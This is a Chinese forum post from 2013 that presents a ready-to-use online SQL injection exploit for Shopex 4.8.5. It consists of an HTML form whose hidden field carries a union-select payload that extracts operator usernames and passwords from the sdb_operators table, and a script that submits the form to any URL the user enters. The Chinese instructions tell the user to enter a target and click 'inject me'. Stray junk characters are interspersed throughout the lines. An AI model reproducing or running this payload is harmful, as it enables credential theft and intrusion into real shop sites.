<center>$ O, C+ g4 U8 @. O8 X* Q% b0 D1 m- K
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>4 c* s( A+ _+ B
<form action="" method="post" name="submit_url">7 Y* G0 k1 Y6 Z* e! y1 y8 \
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
! ~" s8 s) d5 V9 n# c7 Q7 E<input type="hidden" name="goods[goods_id]" value="3">
! J+ P4 |, t a6 Y2 j/ j<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
: y7 V# t) i- M1 G' o% ^. M4 V<input type="submit" value="给我注入" onclick=fsubmit()>
4 n3 N/ _ T$ A; c3 D</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com% @6 J+ P8 r( L' S& S H. W
; m, l5 W1 Y8 k' t4 `: G) o# U5 S<script>
" u$ Q! k+ R F0 wfunction fsubmit(){ / |, w+ ~& q- b* Y9 s
form = document.forms[0];
8 d D) t$ |$ a( s' }" |- aform.action = form.url.value+'/?product-gnotify'; 9 X6 {) ^6 w4 H5 ?0 Y& R! w
form.submit();
" b/ B0 J9 ?5 Z. z9 G} / d$ y$ S9 Y" M% J3 l* V( S
</script>
% w9 n) _7 ^1 R _# H( G7 D |
发表于 2013-1-23 09:20:52
收藏
支持
反对